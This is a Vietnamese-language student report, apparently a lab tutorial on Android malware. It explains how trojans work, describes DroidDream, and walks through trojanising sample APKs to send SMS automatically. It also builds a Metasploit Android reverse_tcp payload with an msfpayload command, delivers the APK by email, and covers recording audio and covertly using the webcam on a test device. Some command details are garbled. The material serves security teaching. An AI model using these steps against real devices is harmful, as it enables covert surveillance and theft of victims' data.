- Lỗ hổng bảo mật khi kết nối WI-FI
- Lỗ hổng bảo mật Heartbleed
- Lỗ hổng bảo mật Fake ID
3 Nghiên cứu Malware, Trojan và cơ chế tạo mã độc trên Android:
Malware, hay phần mềm độc hại, là loại phần mềm được thiết kế để xâm nhập và gây hại cho máy tính, cũng như thu thập thông tin và truy cập dữ liệu nhạy cảm mà người dùng không hay biết Các loại malware phổ biến bao gồm virus, worm, trojan horse, adware, spyware, keylogger, backdoor và rootkit.
Trojan Horse, hay còn gọi là Trojan, là một loại phần mềm độc hại được thiết kế để lén lút xâm nhập vào hệ thống của người dùng mà không cần tự tái tạo Nó thường giả mạo dưới dạng một ứng dụng hợp pháp, khiến người dùng dễ dàng cài đặt mà không nhận ra mối đe dọa.
Hiện nay, malware chủ yếu xâm nhập vào máy tính để đánh cắp thông tin người dùng mà không có cơ chế lây lan Cách thức hoạt động của malware tương tự như trojan, không giống như virus gây hại và phá hủy hệ thống.
- Đơn giản là malware và trojan giúp tin tặc truy cập vào máy người dùng, điều khiển từ xa, thu thập thông tin người dùng…
3.2 Cơ chế hoạt động của Malware:
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là
Malware DroidDream Malware này hoạt động qua 2 giai đoạn:
Giai đoạn 1 của DroidDream bắt đầu khi mã độc này được nhúng vào một ứng dụng, với hơn 50 ứng dụng hiện tại chứa phần mềm độc hại Ngay sau lần đầu tiên bạn chạy ứng dụng đó, DroidDream sẽ chiếm quyền root trên thiết bị của bạn.
Trong giai đoạn 2 của quá trình, DroidDream tự động cài đặt một ứng dụng thứ hai với quyền truy cập đặc biệt cho phép gỡ bỏ cài đặt Sau khi ứng dụng này được cài đặt, nó có khả năng gửi thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Khi đã chiếm được quyền root, phần mềm độc hại này sẽ chờ đợi và cài đặt một ứng dụng thứ hai có tên DownloadProviderManager.apk như một ứng dụng hệ thống.
Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép
Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt
3.3 Cơ chế hoạt động của Trojan:
- Trojan có nhiều loại nhưng phổ biến là 2 loại: Trojan dùng để điều khiển và Trojan dùng để đánh cắp mật khẩu
Cả hai loại trojan đều có cơ chế hoạt động tương tự, bắt đầu bằng việc lây nhiễm vào máy tính thông qua tập tin đính kèm trong email, chương trình trò chơi hoặc ứng dụng mà người dùng vô tình khởi động Sau khi xâm nhập, trojan sẽ tự sao chép vào một vị trí nhất định trong máy tính và ghi lại các thông số vào registry, cho phép nó tự động khởi chạy khi máy tính khởi động.
Trojan điều khiển cho phép tin tặc từ xa kiểm soát máy tính của nạn nhân, trong khi trojan đánh cắp mật khẩu lưu trữ thông tin đăng nhập của người dùng vào một file và tự động gửi qua email cho tin tặc khi máy tính kết nối internet.
V CÀI ĐẶT VÀO THIẾT BỊ ANDROID TROJAN ỨNG DỤNG iCALENDAR VÀ TROJAN ỨNG DỤNG iMATCH
Cơ chế Permission bảo vệ các tác vụ ảnh hưởng đến ứng dụng, hệ điều hành và người sử dụng thiết bị, như gửi tin nhắn và truy cập thông tin cá nhân Các lập trình viên sẽ khai báo Permission cho những nguồn tài nguyên mà ứng dụng cần truy cập Trước khi cài đặt ứng dụng, người dùng sẽ được thông báo về những Permission này.
1 Các Tools cần thiết để cài đặt:
- Máy ảo Android ADV trên phần mềm Eclipse
- Ứng dụng iCalendar.apk và iMatch.apk
- Tải phần mềm Super Apktool v2.1 tại link: http://mobilelife.vn/resources/super-apk-tool-v2-0-cong-cu-chinh-sua-apk-bang- giao-dien-cuc-manh.12/
- Tải Dex2Jar tại link: https://code.google.com/p/dex2jar/
2 Tải về và xem source code của các ứng dụng *.apk:
- Dùng phần mềm Dex2Jar để chuyển đổi file *.dex thành file *.jar
- Tiếp theo xem source code của ứng dụng *.apk bằng phần mềm Jd-gui
Bước 2: Sau khi tải ứng dụng định dạng *.apk về Ta giải nén bằng phần mềm
WinRAR Sau đó copy file classes.dex của ứng dụng vào thư mục chứa phần mềm Dex2Jar
Bước 3: Mở command trong Window lên
Di chuyển đến thư mục phần mềm Dex2Jar bằng lệnh cd
Bước 4: Chuyển đổi file bằng lệnh “dex2jar ”
Bước 5: Dùng Jd-gui mở file classes_dex2jar.jar vừa được tạo để xem source code của ứng dụng
- Lưu ý là chúng ta chỉ có thể xem nhưng không chỉnh sửa được
3 Cài đặt Trojan ứng dụng iCalendar.apk:
Cài đặt ứng dụng Trojan iCalendar trên máy ảo Android 5554 và tự động gửi tin nhắn đến máy ảo Android 5556 Ứng dụng iMatch cho phép gửi một tin nhắn Trong phần Device, chọn máy mà bạn muốn cài đặt tệp iCalendar.apk.
Bước 4: Chọn file iCalendar.apk > Chờ phần mềm giải nén xong
Bước 5: View > View Smali Code: Cho phép chỉnh sửa code của ứng dụng iCalendar.apk
Bước 6: Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali
- File iCalendar.smali, sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin nhắn) và line 253 (là nội dung tin nhắn)
- File SmsReceiver.smali, ta sửa code ở line 41 thành số điện thoại mà máy mình muốn gửi đến, giống như ở iCalendar.smali
- Sau khi sửa code, ta phải Save lại 2 file trên
Bước 7: Run > Build : cho phép bắt đầu quá trình cài đặt trojan iCalendar.apk vào 1 máy ảo Android và gửi tin nhắn tự động đến máy ảo Android khác
Nếu nạn nhân nhấp vào ứng dụng iCalendar nhiều lần, thiết bị Android sẽ nhận được tin nhắn tự động từ số điện thoại 5556.
4 Cài đặt Trojan ứng dụng iMatch.apk:
Cài đặt ứng dụng Trojan iMatch trên máy ảo Android 5558 cho phép tự động gửi tin nhắn đến hai máy ảo Android 5556 và Android 5554 Ứng dụng iMatch hỗ trợ gửi đồng thời bốn tin nhắn.
Khởi động ba máy ảo và tạo một project mới, sau đó trỏ đến file iMatch.apk Đợi cho ứng dụng được giải nén và chọn View để xem mã Smali, tương tự như thao tác với file iCalendar.apk.
Bước 2: Sửa code của file MJUtils.smali
- Chỉnh sửa số điện thoại ở các line 57, line 66, line 75, line 84; chỉnh sửa nội
Bước 4: Run > Build : cho phép bắt đầu quá trình cài đặt trojan iMatch.apk và gửi tin nhắn tự động
- Kết quả ta nhận được ở máy Android có số điện thoại 5558 (bị cài đặt trojan iMatch.apk)
- Kết quả nhận được ở máy Android 5556 và Android 5554 (bị gửi tin nhắn tự động)
VI TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID
1 Các công cụ cần thiết: Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị:
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track) Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm)
- Thiết bị chạy Android ảo Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3
- Cả 2 thiết bị đều có thể kết nối mạng
- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android
Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được
Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở ô Bridged to
Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig”
Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android Ở đây ta tạo file ứng dụng *.apk và gửi qua email
Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=< địa chỉ IP máy tấn công > lport=< địa chỉ port > R > < địa chỉ lưu lại > / < tên file >”
Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost2.168.149.136 lport80 R > /root/Desktop/appsX.apk
- Tạo ứng dụng ReverseTCP có trên file là appsX.apk
- Địa chỉ IP máy tấn công là 192.168.149.136
- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023)
Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh:
Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công
Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng dụng MainActivity Khởi động lên và nhấp vào ReverseTCP
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân
Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được
2.1 Khai thác thông tin hê thống:
Xem thông tin hệ thống bằng lệnh “sysinfo”
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali
2.3 Khai thác webcam và chụp ảnh lén:
